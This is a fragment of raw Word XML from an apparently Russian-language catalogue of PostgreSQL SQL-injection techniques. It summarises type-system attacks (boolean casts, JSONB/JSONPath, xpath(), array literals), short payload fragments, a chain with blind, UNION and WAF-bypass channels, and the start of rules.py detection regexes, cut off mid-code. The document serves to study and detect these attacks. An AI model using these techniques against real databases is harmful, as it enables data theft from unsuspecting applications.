        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Саммари категории 3.11</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">В категории 3.11 разобраны четыре класса атак через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">систему типов PostgreSQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — приёмы, где payload работает через семантику types и implicit coercion, а не через классические SQL-структуры. Это вторичные DSL-языки (JSONPath, XPath) и type-specific операторы (BOOLEAN cast, ARRAY containment), которые превращают одну injection-точку в несколько каналов утечки.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3.11.1 Boolean coercion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'$x'::boolean</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> implicit cast: error-based leak через invalid-boolean-syntax, sanitizer-bypass через 12+ принимаемых литералов (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserv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'yes'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short-circuit-oracle через 200/500 HTTP-status. Три payload-карточки.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3.11.2 jsonb -&gt; и -&gt;&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — JSONB-операторы как точка инъекции: arbitrary key extraction (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">data-&gt;&gt;'$user_path'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), JSONPath injection (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">data @@ '$.path == "value"'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) с полноценным DSL (рекурсивный спуск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regex </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">like_regex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, фильтры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cast confusion </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(data-&gt;&gt;'k')::int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → 3.2. Три payload-карточки.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3.11.3 xpath() и XML-tricks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — XPath 1.0 injection через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">xpath('$expr', xml_col)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: прямое извлечение (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/private/ssn/text()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), blind oracle через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">xpath_exists</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, computed-path в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">xmltable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. XXE в PG </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">закрыт</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (CVE-2017-7484, XML_PARSE_NONET) — OOB-канал недоступен. Четыре payload-карточки.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3.11.4 Array vs scalar: ANY($1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — driver-уровневое маршалирование scalar↔array + injection через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">string_to_array('$x', ',')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Containment-операторы (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">@&gt;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&amp;&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) с user-controlled array literal. Driver-specific особенности psycopg/asyncpg/pgjdbc/pgx/node-postgres. Четыре payload-карточки.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Сравнение векторов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Точка инъекции</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Тип leak</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 привилегия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WHERE bool_col = '$x'</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 / blind 200-vs-500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7.x+ (все)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data-&gt;&gt;'$key'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> или </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">@@ '$.path'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direct / blind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9.3+ (-&gt;&gt;); 12+ (jsonpath)</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xpath('$expr', xml_col)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direct / blind boolean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 (xml column required)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8.3+ (все)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string_to_array('$x', ',')</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> или </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">ANY(ARRAY[$x])</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классический UNION-через-type-cast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7.x+ (все)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Все четыре подраздела работают на PUBLIC — типовая система PG не требует privileges, только SELECT на target.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Типичная цепочка применения</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.11 — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">точка входа</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Сам по себе type-cast не утечёт данные — нужен downstream leak-механизм. Цепочка:</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3.11.1/2/3/4 как entry point</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — атакующий находит, где приложение конкатенирует user-input в type-specific контекст (BOOLEAN, jsonb path, XPath, array).</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Leak-механизм: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3.2 (error-based) — для всех 4 подразделов через cast-error.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3.3 (boolean-blind) — через 3.11.1 short-circuit или 3.11.3 xpath_exists.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 (UNION) — через 3.11.4 string_to_array breakout.</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3.9 (filter bypass)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — обход WAF на специфические keywords (например,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 через 3.9.5 hex inside JSONPath).</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3.8 (metadata)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — атакующий читает структуру через 3.11 same или новый channel (например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">data-&gt;&gt;'role'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> через 3.11.2 без знания, что есть </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">role</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-ключ — recon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JSONPath).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Главное правило: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.11 расширяет поверхность 3.1/3.2/3.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, добавляя type-specific entry points, которые классические SQLi-сканеры пропускают.</w:t>
      </w:r>
    </w:p>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vs 3.11.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3.2 — про cast-error mechanic в общем; 3.11 — про specific cast-targets (BOOLEAN, jsonb path, xpath, array). Семантически связаны: 3.11 даёт точку, 3.2 даёт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 (Metadata) vs 3.11.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3.8 — про каталоги PG (pg_class, pg_proc, etc.); 3.11 — про user-data структуры (JSONB-документы, XML-документы). Разные источники, общий канал (cast-error / UNION).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(Filter bypass) vs 3.11.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3.9 — про encoding payload-а до парсера PG; 3.11 — про эксплуатацию правил типов после парсера. Часто комбинируются.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vs 3.11.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ортогональны. 3.11 — про single-statement type-injection; 3.5 — про multi-statement. Не пересекаются.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">rules.py — готовое правило для класса TYPE_INJECTION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сводный regex по всем четырём подразделам 3.11. Структура такая же, как для предыдущих категорий.</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TYPE_INJECTION = "type_injection"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VulnerabilityClass.TYPE_INJECTION: 7,</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"type_inj_boolean_concat": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.11.1 — concat в bool-context</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"=\s*['\"][^'\"]{0,20}['\"]\s*\|\|\s*\(\s*SELECT\b",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"type_inj_jsonb_path": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.11.2 — concat в JSON path</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"(?:-&gt;&gt;?|#&gt;&gt;?)\s*['\"][^'\"]*['\"]?\s*\|\||"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # JSONPath DSL with suspicious operators</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"@@\s*['\"][^'\"]*?(?:like_regex|\.\*\*|\?\([^)]+\))",</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"type_inj_xpath": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.11.3 — xpath/xpath_exists/xmltable с runtime-вычисленным выражением</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"\bxpath(?:_exists)?\s*\(\s*['\"][^'\"]*['\"]?\s*\|\||"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"\bxmltable\s*\(\s*['\"][^'\"]*['\"]?\s*\|\||"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
